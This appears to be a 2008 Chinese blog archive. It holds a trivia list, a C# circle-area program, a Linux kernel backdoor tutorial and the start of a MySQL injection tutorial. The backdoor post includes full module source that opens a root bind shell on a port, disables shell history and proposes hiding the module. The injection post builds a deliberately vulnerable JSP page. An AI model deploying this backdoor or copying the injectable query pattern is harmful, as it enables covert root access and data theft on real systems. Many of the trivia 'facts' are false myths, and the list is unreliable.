Eche!on

99.999%的人都不知道的秘密

Thu, 02 Oct 2008 21:37:10 +0000

1.拉斯维加斯的赌场都没有钟表
2.麦当劳40%的利润来自Happy Meals的销售。
3.1996版的韦伯斯特词典有315处拼写错误。
4.每天平均有12个新生儿被交给错误的父母。
5.巧克力对于狗来说是致命的，只要几盎斯就可以使一只小狗，因为心脏和神经系统受损而死亡
6.19世纪30年代番茄酱是作为药品来销售的。
7.达芬奇可以一手写字，同时另一手作画。
8.剪刀是达芬奇发明的。
9.描绘蒙娜丽莎的嘴唇花费了达芬奇10年的时间。
10.二战期间颁发的奥斯卡奖座是木制的，因为当时金属是稀缺物资。
11.看看你的拉链，如果上面有YKK三个字母，那么说明这是全球最大的拉链制造商Yoshida Kogyo Kabushibibaisha的产品。
12.李小龙的动作非常快，快到看不清，所以拍电影时只好放慢胶片的速度。
13.仰面躺着并缓缓地抬起双腿，可以免于陷入流沙之中。
14.驱蚊水并不驱蚊而是干扰蚊子的感觉器官，这样它们就找不到人在哪里。
15.牙医建议，牙刷应放置于距离盥洗室至少6英尺远，以避开冲马桶时产生并漂浮于空气中的各种微粒。
16.最早被打上条形码的产品是箭牌口香糖。
17.迈克尔.乔丹每年从耐克得到的收入多于马来西亚的耐克工厂工人的薪水总和。
18.玛丽莲.梦露的一只脚上有6个指头。
19.希特勒的母亲曾考虑堕胎，不过被医生劝阻了。
20.一生中人会脱落40磅的皮肤。
21.要是不小心被鳄鱼咬到了，你就狠狠地戳它的眼球，它会放你走。
22.人平均只需7分钟就可以入睡。
23.在菲律宾溜溜球曾被作为武器。
24.猫是圣经里面唯一没有提到的家养动物。
25.冷藏时橡皮筋可以保存得更好。
26.56%的键盘录入由左手完成。
27.”dreamt”是唯一以”mt”结尾的英文单词。
28.即使没有头，蟑螂仍可存活10天。
29.打喷嚏时无法睁着眼睛。
30.墨西哥城每年下沉10英寸。
31.睡眠时的脑比看电视时更活跃。
32.80%的美国人最喜欢蓝色。
33.在这个星球上鸡比人多。
34.大拇指的指甲长得最慢，中指的指甲长得最快。
35.在美国华盛顿电话比人还多。
36.48个最贫困的国家其资产总和还比不上全球最富有的三大家族。
37.万宝路香烟公司的第一任老总死于肺癌。
38.聪明人的头发中含有更多的锌和铜。
39.世界上最年轻的父母是1910年一对中国的小孩，分别8岁和9岁。
40.出生时，我们的眼睛多大，现在还是多大。但是鼻子和耳朵一直都在长。
41.睡觉时耗费的热量比看电视时还要多。
42.人不睡觉大约10天就会死亡。
43.切洋葱时嚼口香糖就不会流泪。
43.蒙娜丽莎没有眉毛。
44.如果月亮正好在头顶上方，那么你的体重会稍微的减少。
45.发明了电话的亚历山大.贝尔从未给他的母亲或妻子打过电话，因为她们都失聪了。
47.”I am.”是英语中最短的完整句。
48.如同指纹，每个人的舌纹都不同。
49.”bookkeeper”是英语中唯一一个连续3次重复字母的单词。
50.惯用右手的人们平均比惯用左手的人们寿命长9年。
51.”The quick brown fox jumps over the lazy dog”用到了英语中所有的字母。
52.如果所有的中国人排成一线从你面前走过，由于过高的出生率，这条线将永远没有尽头。
53.在中国使用英语的人比美国还多。
54.人体每平方英寸的皮肤包含有20英尺长的血管。
55.人平均每天使用洗手间6次。
56.婴儿出生时有300块骨骼，成人后只有206块。
57.胡须是生长速度最快的人体毛发。如果一名男性从不修容，终其一生他将蓄出30英尺长的胡须
58.先有鸡还是先有蛋？根据《圣经创世纪 1:20-22》，先有鸡。
59.仍在使用的最长的地名是：Taumatawhakatangihangaoauauotameteaturi-
Pukakpikimaungahoronukupokaiwhenuakitanatahu，那是新西兰的一处丘陵。
60.如果你早上7点乘坐飞机离开东京，那么当你到达檀香山的时候，时间是昨天下午4点半。
61.澳大利亚帕凯斯天文台的科学家们曾以为他们接收到了来自地外文明的电波，经过调查，发现那道电波其实来自天文台里的一个微波炉。
62.戴耳塞一小时，耳朵里的细菌数量将是原来的700倍。
63.一个French kiss可以交换超过40000个寄生虫和250种细菌。
64.男性较女性视力好，女性较男性听力好。
65.可口可乐最初是绿色的。
66.世界上最常见的名字是：穆罕默德。
67.如果不把”north”和”south”算在内，在英语中，七大州的首尾字母都相同。
68.平均每个美国人有两张信用卡。
69.”无效writer”是用QWERTY键盘的单排按键所能够写出的最长英文单词。
70.失明的女性是男性的两倍。
71.人不会因为屏息而死。
72.当你打喷嚏的时候，你的心脏会停止跳动约1毫秒。
73.猪无法看到天空。
74.”Sixth sick sheik’s sixth sheep’s sick”是英语中最绕口的绕口令。
75.过于剧烈的喷嚏会震裂肋骨，而试图憋住喷嚏将使颈部或者颅内的血管破裂从而致命。
76.扑克牌中每个花色的K都代表着历史上的伟大君王：黑桃是大卫王，梅花是亚历山大大帝，红桃是查理大帝，方块是凯撒大帝。
77.111,111,111 x 111,111,111 = 12,345,678,987,654,321。
78.当你看到一尊骑士的雕像，如果马是四脚腾空的，那么此人战死沙场。
79.同上，如果马的一只前脚抬起，那么此人因在战斗中负重伤而牺牲。
80.同上，如果马的四脚皆着地，那么此人死于自然原因。
81.蜂蜜不会变质。
82.鳄鱼无法伸出它的舌头。
83.蜗牛一觉可以睡上3年。
84.所有的北极熊都是左撇子。
85.1987年，美国航空公司在向头等舱提供的每份沙拉中，减少1颗橄榄，从而节省了40000 美元。
86.蝴蝶的味觉器官在它们的脚上。
87.大象跳不起来。
88.在过去的4000年里，没有新的动物被驯养。
89.一般来说，人们害怕蜘蛛胜过死亡。
90.”assassination”和”bump”这两个词是莎士比亚创造的。

计算圆,及其内外接正方形面积

Sun, 28 Sep 2008 19:11:41 +0000

using System;
using System.Collections.Generic;
using System.Text;

namespace s_yuan
{
    class Program
    {
        static void Main(string[] args)
        {
            double s,s1,s2,r;
            const double PI = 3.1415;
            string x;
            Console.WriteLine("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=");
            Console.WriteLine("-=                C#求圆,其内接,外接正方形面积(s,s1,s2)                -=");
            Console.WriteLine("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=");
            Console.WriteLine("");
            do
            {
                Console.WriteLine("");
            Console.Write("请输入圆的半径 r=");
                r = Double.Parse(Console.ReadLine());
                s = PI * r * r;
                s1 = 2 * r * r;
                s2 = 4 * r * r;
                Console.WriteLine("");
                Console.WriteLine("圆面积:{0}", s, s1, s2);
                Console.WriteLine("圆内接正方形面积:{1}", s, s1, s2);
                Console.WriteLine("圆外接正方形面积:{2}", s, s1, s2);
                Console.WriteLine("");
            Console.Write("[Go on ?  Y/N]:");
                x = (Console.ReadLine());
            }while (x == "y");
            Console.WriteLine("End!!!");
            Console.ReadLine();

        }
    }
}

抒写Linux 2.6.x下内核级后门程序

Sun, 28 Sep 2008 18:59:16 +0000

Author: wzt
EMail: wzt@xsec.org
Site: http://www.xsec.org & hhtp://hi.baidu.com/wzt85
Date: 2008-8-29

一. 内核后门简介
二. 内核中系统调用
三. 使用kernel mode socket函数
四. 如何扩展后门
五. 参考资料
六. 相关源代码

一. 内核后门简介

所谓内核后门，当然指的是在内核空间中给hacker提供的可远程控制的shell模块喽，性质跟ring3下的后门一样，只是所有功能都在内核空间实现了而已。其实它跟rootkit的定义基本已经混淆了。有的内核后门不能提供隐藏行为的功能，有的rookit没有提供远程shell的功能。只有两者互补才能组合成一个功能强的'root-kit'.
本文只介绍2种实现内核后门的基本方法，如果您有更好的方法，还请多多指教。

二. 内核中系统调用

Unix 世界中一切皆文件的思想将socket通信变的简单的多，通常我们直接可以用read，write等api函数作为socket通信的方法，这些api函数最终都会调用kernel提供的sys_XXX系列函数。平时用到的read等函数早以在c库中封装好了。其实我们可以自己直接向系统发送软中断int 0x80来执行sys_read函数，如：

int my_read(int fd, char * buf, off_t count)
{
long __res;

__asm__ volatile ("push %%ebx; int $0x80; pop %%ebx"

: "=a" (__res)
: "0" (__NR_read), "ri" ((long)(fd), "c"((long)(buf),
"d" ((long)(count)) :"memory");

return (int)(__res);
}

这里用到了at&t的内嵌汇编程序来实现, 其实就是向eax寄存器中存入具体的系统调用号，ebx，ecx，edx依次存入read函数的参数。最后执行一个int $0x80陷入内核去执行sys_read.要想在内核空间中实现后门的功能，就必须调用某些函数来进行socket通信。本节介绍直接在内核中使用系统调用的方式来和远程用户进行通讯,下一节则介绍直接使用内核socket函数进行通讯。

通过上面的例子，我们明白了如何在用户空间下来使用系统调用。那么上述方法也可以用在内核空间中，这样在内核空间执行系统调用感觉效率会很低，但是对我们来说，编写程序将会非常的方便。著名的sk rookti就是用这种方式来进行通讯的。

linux内核提供了很多个不同的系统调用，我们需要编写几个宏来方便的使用这些系统调用。比如下面这几个宏：

#define my__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-(128 + 1))) { \
errno = -(res); \
res = -1; \
} \
return (type) (res); \
} while (0)

#define my_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; int $0x80 ; pop %%ebx" \
: "=a" (__res) \
: "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)) : "memory"); \
my__syscall_return(type,__res); \
}

my_syscall3代表这个系统调用有3个参数，以read系统调用为例，我们可以在内核空间中这样使用它：
static inline my_syscall3(int, read, int, fd, char *, buf, off_t, count);

编译的时候就会被展开成:

int read(int fd, char * buf, off_t count) \
{ \
long __res; \

__asm__ volatile ("push %%ebx; int $0x80; pop %%ebx"\

: "=a" (__res) \
: "0" (__NR_read), "ri" ((long)(fd), "c"((long)(buf), \
"d" ((long)(count)) :"memory"); \

return (int)(__res);\
}

本文后面将会给出比较全面的宏，通过这些宏，可以在内核中随意的使用系统调用。

好了，现在可以使用read, write, select等系统调用在内核空间收发信息了。但是怎么在内核中使用平时在用户空间下用到的那些socket函数呢？其实这些socket函数都是通过执行sys_socketall系统调用来实现的：

linux-2.6.18/net/socket.c

asmlinkage long sys_socketcall(int call, unsigned long __user *args)
{
unsigned long a[6];
unsigned long a0,a1;
int err;

...

a0=a[0];
a1=a[1];

switch(call)
{
case SYS_SOCKET:
err = sys_socket(a0,a1,a[2]);
break;
case SYS_BIND:
err = sys_bind(a0,(struct sockaddr __user *)a1, a[2]);
break;
case SYS_CONNECT:
err = sys_connect(a0, (struct sockaddr __user *)a1, a[2]);
break;
case SYS_LISTEN:
err = sys_listen(a0,a1);
break;
case SYS_SOCKETPAIR:
err = sys_socketpair(a0,a1, a[2], (int __user *)a[3]);
break;
case SYS_SEND:
err = sys_send(a0, (void __user *)a1, a[2], a[3]);
break;
...
}

通过向sys_socketcall函数2个参数来执行具体的函数调用，参数call一般为SYS_SOCKET, SYS_BIND等，args是一个数组，通过向这个数组的每个元素赋值，来调用不同的函数。以bind这个函数为例，可以这样调用：

struct sockaddr_in cli_addr;
unsigned long args[];

args[0] = sock_fd;
args[1] = (unsigned long)cli_addr;
args[2] = (unsigned long)sizeof(struct sockaddr_in);

sys_socketcall(SYS_BIND, args);

其他函数类似。这样就可以在内核中来使用这些socket函数了。

下面给出一个具体的监听某一个端口的例子：
int k_listen(int port)
{
struct task_struct *tsk = current;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;
mm_segment_t old_fs;
char buff[100];

unsigned long arg[3];
int sock_fd, sock_id;
int tmp_kid;
int i, n, cli_len;

old_fs = get_fs();

tsk->uid = 0;
tsk->euid = 0;
tsk->gid = SGID;
tsk->egid = 0;

/* create socket */
arg[0] = AF_INET;
arg[1] = SOCK_STREAM;
arg[2] = 0;

set_fs(KERNEL_DS);

ssetmask(~0);

for (i=0; i < 4096; i++)
close(i);

if ((sock_fd = socketcall(SYS_SOCKET, arg)) == -1) {
set_fs(old_fs);

return 0;
}
printk("create socket ok.\n");

/* bind address */
memset((void *) &serv_addr, 0, sizeof(serv_addr));

serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(port);
serv_addr.sin_addr.s_addr = 0;

arg[0] = sock_fd;
arg[1] = (unsigned long) &serv_addr;
arg[2] = (unsigned long) sizeof(serv_addr);

if ((socketcall(SYS_BIND, arg)) == -1) {
close(sock_fd);
set_fs(old_fs);

return 0;
}
printk("bind address ok.\n");

/* begin listen */
arg[0] = sock_fd;
arg[1] = (unsigned long) 255;

if ((socketcall(SYS_LISTEN, arg)) == -1) {
close(sock_fd);
set_fs(old_fs);

return 0;
}
printk("listen on port %d\n", port);

cli_len = sizeof(cli_addr);
arg[0] = sock_fd;
arg[1] = (unsigned long) &cli_addr;
arg[2] = (unsigned long) &cli_len;

if ((sock_id = socketcall(SYS_ACCEPT, arg)) == -1) {
printk("accept error.\n");

close(sock_fd);
set_fs(old_fs);

return 0;
}
printk("accept a client.\n");

dup2(sock_id, 0);
dup2(sock_id, 1);
dup2(sock_id, 2);

execve(earg[0], (const char **) earg, (const char **) env);

close(sock_id);
close(sock_fd);
set_fs(old_fs);

return 1;
}

三．使用kernel mode socket函数

前面考虑到在内核空间使用系统调用会使系统效率有所降低。解决的方法是直接在内核中使用内核socket函数来进行通讯。我们去看看kernel mode socket是怎么在内核中实现的，同样在linux-2.6.18/net/socket.c中：

在user mode socket中的socket函数的功能是建立个套接字，它是调用sys_socket函数来实现的，因此我们在自己的模块中直接使用它的函数来完成相同的功能.先看下它是怎么实现的：

asmlinkage long sys_socket(int family, int type, int protocol)
{
int retval;
struct socket *sock;

retval = sock_create(family, type, protocol, &sock);
if (retval < 0)
goto out;

retval = sock_map_fd(sock);
if (retval < 0)
goto out_release;

out:

return retval;

out_release:
sock_release(sock);
return retval;
}

关键就2个函数，sock_create()来初始化一个struct socket结构体,在用sock_map_fd()来给刚才的socket结构分配一个空闲的文件描述符。有兴趣的读者可以继续深入这些函数，看看它的具体实现细节。在这里我们只关心最上层的这2个函数。因为我们要在自己的模块中调用它们。同样对于 sys_bind, sys_listen等，我们用同样的办法来处理。有了源代码，看它们怎么实现，我们就怎么实现。

下面给出一个监听某端口的例子：

int k_listen(void)
{
struct socket *sock,*newsock;
struct sockaddr_in server;
struct sockaddr client[128];
char address[128];
int sockfd, sockid, i,size = 0;
int error = 0,len = sizeof(struct sockaddr);

//set_fs(KERNEL_DS);

error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
if (error < 0) {
printk("[-] socket_create failed: %d\n",error);
sock_release(sock);
return -1;
}

sockfd = sock_map_fd(sock);
if (sockfd < 0) {
printk("[-] sock_map_fd() failed.\n");
sock_release(sock);
return -1;
}

for (i = 0; i < 8; i++)
server.sin_zero[i] = 0;

server.sin_family = PF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(port);

error = security_socket_bind(sock,(struct sockaddr *)&server,len);
if (!error) {
error = sock->ops->bind(sock,(struct sockaddr *)&server,len);

if (error < 0) {
printk("[-] unix_bind() failed.\n");
sock_release(sock);
return -1;
}

}

error = sock->ops->listen(sock,5);
if (error < 0) {
printk("[-] unix_listen failed.\n");
sock_release(sock);
return -1;
}
printk("[+] listen port %d ok.\n",port);

if (!(newsock = sock_alloc())) {
printk("[-] sock_alloc() failed.\n");
sock_release(sock);
return -1;
}

newsock->type = sock->type;
newsock->ops = sock->ops;

printk("[+] waiting for a client.\n");

if (newsock->ops->accept) {
error = security_socket_accept(sock,newsock);
if (error < 0)
goto out_release;

if ((error = newsock->ops->accept(sock,newsock,sock->file->f_flags)) == -ERESTARTSYS) {
printk("[-] accept got a signal.\n");
goto out_release;
}
else if (error < 0) {
printk("[-] unix_accept failed.\n");
goto out_release;
}

if (newsock->ops->getname(newsock,client,&len,1) < 0)
goto out_release;

security_socket_post_accept(sock,newsock);

sockid = sock_map_fd(newsock);
if (sockid < 0) {
printk("[-] sock_map_fd() failed.\n");
sock_release(newsock);
return -1;
}

printk("[+] accept a client.\n");

kshell(sockid);
}

return 1;

out_release:
sock_release(sock);
sock_release(newsock);

return 0;
}

四. 如何扩展后门

如果费这么大力气在内核中就实现了这么简单的功能，还不如在用户空间实现。
问题关键是我们现在在内核中，只要对内核有足够的了解，还有什么不能实现的呢？
内核源码在手，能做什么,就看你的想象力了。首先是加上一些常用的rookit技巧，如隐藏网络连接，hack下tcp4_seq_show就行了，隐藏模块list_del一下就行了。为了控制方便，加个pty支持吧。再牛的搞个端口复用吧。想嗅探启动吗？用netfilter过滤下就行了。

下面说说编写更高级后门时需要注意的一些地方：

1. 现在你在内核中，就要考虑并发和竞态的问题，给临界区加个锁或信号量是不错的选择。

2. 如果你想做一个定时回连的后门，请不要使用内核定时器。它的执行函数是在原子方式下执行的，也就是这个时候你不能去访问用户空间的东西，如果引起了休眠，内核可能就oops了。你可以使用 schedule_timeout()让当前模块休息几秒，当调度程序把它调度回来的时候在尝试一次回连的操作，就不会有问题了。

五. 参考资料

[1] Linux kernel source code
http://www.kernel.org

[2] sk1.3-b source code – sd
http://sd.g-art.nl/sk

[3] enyelkm 1.2 - RaiSe && David Reguera
http://www.enye-sec.org

[4] wnps-2.26 – wzt
http://hi.baidu.com/wzt85

六. 相关源代码

Syscalls.h

/* macros de syscalls */

int errno;

#define my__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-(128 + 1))) { \
errno = -(res); \
res = -1; \
} \
return (type) (res); \
} while (0)

/* XXX - _foo needs to be __foo, while __NR_bar could be _NR_bar. */
#define my_syscall0(type,name) \
type name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name)); \
my__syscall_return(type,__res); \
}

#define my_syscall1(type,name,type1,arg1) \
type name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
: "=a" (__res) \
: "0" (__NR_##name),"ri" ((long)(arg1)) : "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall2(type,name,type1,arg1,type2,arg2) \
type name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
: "=a" (__res) \
: "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)) \
: "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
: "=a" (__res) \
: "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)) : "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
: "=a" (__res) \
: "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)) : "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5) \
type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; movl %1,%%eax ; " \
"int $0x80 ; pop %%ebx" \
: "=a" (__res) \
: "i" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)) \
: "memory"); \
my__syscall_return(type,__res); \
}

Kshell.c

/*
* kenel mode socket door v0.1
*
* by wzt http://www.xsec.org
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "syscalls.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

#define __NR_e_exit __NR_exit

#define SGID 0x489196ab
#define HOME "/"

static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

char *env[]={
"TERM=linux",
"HOME=" HOME,
"PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
":/usr/local/sbin",
"HISTFILE=/dev/null",
NULL };

static inline my_syscall0(pid_t, fork);
static inline my_syscall0(long, pause);
static inline my_syscall2(int, kill, pid_t, pid, int, sig);
static inline my_syscall1(int, chdir, const char *, path);
static inline my_syscall1(long, ssetmask, int, newmask);
static inline my_syscall3(int, write, int, fd, const char *, buf, off_t, count);
static inline my_syscall3(int, read, int, fd, char *, buf, off_t, count);
static inline my_syscall1(int, e_exit, int, exitcode);
static inline my_syscall3(int, open, const char *, file, int, flag, int, mode);
static inline my_syscall1(int, close, int, fd);
static inline my_syscall2(int, dup2, int, oldfd, int, newfd);
static inline my_syscall2(int, socketcall, int, call, unsigned long *, args);
static inline my_syscall3(pid_t, waitpid, pid_t, pid, int *, status, int, options);
static inline my_syscall3(int, execve, const char *, filename,
const char **, argv, const char **, envp);
static inline my_syscall3(long, ioctl, unsigned int, fd, unsigned int, cmd,
unsigned long, arg);
static inline my_syscall5(int, _newselect, int, n, fd_set *, readfds, fd_set *,
writefds, fd_set *, exceptfds, struct timeval *, timeout);
static inline my_syscall2(unsigned long, signal, int, sig,
__sighandler_t, handler);

/**
* the code copy from adore-ng
*/
int wnps_atoi(const char *str)
{
int ret = 0, mul = 1;
const char *ptr;

for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++)
;
ptr--;
while (ptr >= str) {
if (*ptr < '0' || *ptr > '9')
break;
ret += (*ptr - '0') * mul;
mul *= 10;
ptr--;
}
return ret;
}

/**
* in_aton - change str to ipv4 address.
*
* see net/core/utils.c
*/
__u32 wnps_in_aton(const char *str)
{
unsigned long l;
unsigned int val;
int i;

l = 0;
for (i = 0; i < 4; i++) {
l <<= 8;
if (*str != '\0') {
val = 0;
while (*str != '\0' && *str != '.') {
val *= 10;
val += *str - '0';
str++;
}
l |= val;
if (*str != '\0')
str++;
}
}

return(htonl(l));
}

int k_listen(int port)
{
struct task_struct *tsk = current;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;
mm_segment_t old_fs;
char buff[100];

unsigned long arg[3];
int sock_fd, sock_id;
int tmp_kid;
int i, n, cli_len;

old_fs = get_fs();

tsk->uid = 0;
tsk->euid = 0;
tsk->gid = SGID;
tsk->egid = 0;

/* create socket */
arg[0] = AF_INET;
arg[1] = SOCK_STREAM;
arg[2] = 0;

set_fs(KERNEL_DS);

ssetmask(~0);

for (i=0; i < 4096; i++)
close(i);

if ((sock_fd = socketcall(SYS_SOCKET, arg)) == -1) {
set_fs(old_fs);

return 0;
}
printk("create socket ok.\n");

/* bind address */
memset((void *) &serv_addr, 0, sizeof(serv_addr));

serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(port);
serv_addr.sin_addr.s_addr = 0;

arg[0] = sock_fd;
arg[1] = (unsigned long) &serv_addr;
arg[2] = (unsigned long) sizeof(serv_addr);

if ((socketcall(SYS_BIND, arg)) == -1) {
close(sock_fd);
set_fs(old_fs);

return 0;
}
printk("bind address ok.\n");

/* begin listen */
arg[0] = sock_fd;
arg[1] = (unsigned long) 255;

if ((socketcall(SYS_LISTEN, arg)) == -1) {
close(sock_fd);
set_fs(old_fs);

return 0;
}
printk("listen on port %d\n", port);

cli_len = sizeof(cli_addr);
arg[0] = sock_fd;
arg[1] = (unsigned long) &cli_addr;
arg[2] = (unsigned long) &cli_len;

if ((sock_id = socketcall(SYS_ACCEPT, arg)) == -1) {
printk("accept error.\n");

close(sock_fd);
set_fs(old_fs);

return 0;
}
printk("accept a client.\n");

dup2(sock_id, 0);
dup2(sock_id, 1);
dup2(sock_id, 2);

execve(earg[0], (const char **) earg, (const char **) env);

close(sock_id);
close(sock_fd);
set_fs(old_fs);

return 1;
}

static int ksocket_init(void)
{
printk("ksocket start.\n");

k_listen(22);
}

static void ksocket_exit(void)
{
printk("ksocket exit.\n");

}

module_init(ksocket_init);
module_exit(ksocket_exit);

Kshell1.c

/*
* kenel mode socket door v0.1
*
* by wzt http://www.xsec.org
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include "syscalls.h"

#define port 8800
#define LEN 256

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

#define SGID 0x489196ab
#define HOME "/"

static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

char *env[]={
"TERM=linux",
"HOME=" HOME,
"PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
":/usr/local/sbin",
"HISTFILE=/dev/null",
NULL };

static inline my_syscall2(int, dup2, int, oldfd, int, newfd);
static inline my_syscall3(int, execve, const char *, filename,
const char **, argv, const char **, envp);

int kshell(int sock_fd)
{
struct task_struct *tsk = current;
mm_segment_t old_fs;

old_fs = get_fs();
set_fs(KERNEL_DS);

tsk->uid = 0;
tsk->euid = 0;
tsk->gid = SGID;
tsk->egid = 0;

dup2(sock_fd, 0);
dup2(sock_fd, 1);
dup2(sock_fd, 2);

execve(earg[0], (const char **) earg, (const char **) env);

set_fs(old_fs);

return 1;
}

int k_listen(void)
{
struct socket *sock,*newsock;
struct sockaddr_in server;
struct sockaddr client[128];
char address[128];
int sockfd, sockid, i,size = 0;
int error = 0,len = sizeof(struct sockaddr);

//set_fs(KERNEL_DS);

error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
if (error < 0) {
printk("[-] socket_create failed: %d\n",error);
sock_release(sock);
return -1;
}

sockfd = sock_map_fd(sock);
if (sockfd < 0) {
printk("[-] sock_map_fd() failed.\n");
sock_release(sock);
return -1;
}

for (i = 0; i < 8; i++)
server.sin_zero[i] = 0;

server.sin_family = PF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(port);

error = security_socket_bind(sock,(struct sockaddr *)&server,len);
if (!error) {
error = sock->ops->bind(sock,(struct sockaddr *)&server,len);

if (error < 0) {
printk("[-] unix_bind() failed.\n");
sock_release(sock);
return -1;
}

}

error = sock->ops->listen(sock,5);
if (error < 0) {
printk("[-] unix_listen failed.\n");
sock_release(sock);
return -1;
}
printk("[+] listen port %d ok.\n",port);

if (!(newsock = sock_alloc())) {
printk("[-] sock_alloc() failed.\n");
sock_release(sock);
return -1;
}

newsock->type = sock->type;
newsock->ops = sock->ops;

printk("[+] waiting for a client.\n");

if (newsock->ops->accept) {
error = security_socket_accept(sock,newsock);
if (error < 0)
goto out_release;

if ((error = newsock->ops->accept(sock,newsock,sock->file->f_flags)) == -ERESTARTSYS) {
printk("[-] accept got a signal.\n");
goto out_release;
}
else if (error < 0) {
printk("[-] unix_accept failed.\n");
goto out_release;
}

if (newsock->ops->getname(newsock,client,&len,1) < 0)
goto out_release;

security_socket_post_accept(sock,newsock);

sockid = sock_map_fd(newsock);
if (sockid < 0) {
printk("[-] sock_map_fd() failed.\n");
sock_release(newsock);
return -1;
}

printk("[+] accept a client.\n");

kshell(sockid);
}

return 1;

out_release:
sock_release(sock);
sock_release(newsock);

return 0;
}

int k_socket_init(void)
{
printk("[+] kernel socket test start.\n");

k_listen();
}

void k_socket_exit(void)
{
printk("[+] kernel socket test over.\n");
}

module_init(k_socket_init);
module_exit(k_socket_exit);

MYSQL 注射精华

Sun, 14 Sep 2008 07:59:45 +0000

from:www.xfocus.net

1.MYSQL 注射的产生.
    漏洞产生原因 : 程序执行中未对敏感字符进行过滤,使得攻击者传入恶意字符串与结构化数据查询语句合并,并且执行恶意代码.

    咱们先创造一个没有过滤的程序. 因为我机器上没有PHP,所以我就是用 JAVA了,我会详细注释.

代码
数据库:

create database if not exists `test`;

USE `test`;

/*数据表 `account` 的表结构*/

DROP TABLE IF EXISTS `account`;

CREATE TABLE `account` (
  `accountId` bigint(20) NOT NULL auto_increment,
  `accountName` varchar(32) default NULL,
  `accountPass` varchar(32) default NULL,
  PRIMARY KEY  (`accountId`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*数据表 `account` 的数据*/

insert into `account` values
(1,'account1','account1');

/*数据表 `admin` 的表结构*/

DROP TABLE IF EXISTS `admin`;

CREATE TABLE `admin` (
  `adminId` bigint(20) NOT NULL auto_increment,
  `adminName` varchar(32) default NULL,
  `adminPass` varchar(32) default NULL,
  PRIMARY KEY  (`adminId`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

/*数据表 `admin` 的数据*/

insert into `admin` values
(1,'admin','admin');

:
程序:
<%@ page language="java" import="java.util.*,java.sql.*" pageEncoding="utf-8"%>


<%
//连接MYSQL的字符串.
//jdbc:mysql://localhost:3306/test
//驱动:数据库://地址:端口/数据库名称
String mysqlConnection = "jdbc:mysql://localhost:3306/test";

//加载驱动  com.mysql.jdbc.Driver 是JAVA与MYSQL 连接用的JDBC驱动
Class.forName("com.mysql.jdbc.Driver").newInstance();

//建立MYSQL链接 root是用户名 cx0321 是密码
Connection connection = DriverManager.getConnection(mysqlConnection, "root", "cx0321");

//建立一个查询对象
Statement statment = connection.createStatement();

//建立一个查询返回集合. 就是说查询完以后返回的数据全部都在这个里面.
ResultSet resultSet = null;

//从account里面读取数据.
resultSet = statment.executeQuery("select * from account where accountId = '"+ request.getParameter("id") +"'");

//循环,直到resultSet结束
while(resultSet.next())
{
//从resultSet读取出值输出到页面.
    out.print(resultSet.getInt(1)+"|");//取出第一列的值,因为是数字类型的所以是getInt();
    out.print(resultSet.getString(2)+"|");//取出第二列的值,因为是字符串类型的所以是getString();
    out.print(resultSet.getString(3)+"|");
    out.print("
");//页面输出换行
}
%>


2.漏洞的利用

(图1)
这个就是数据库里的记录了.以后黄色为关键语句,红色为输入的部分.
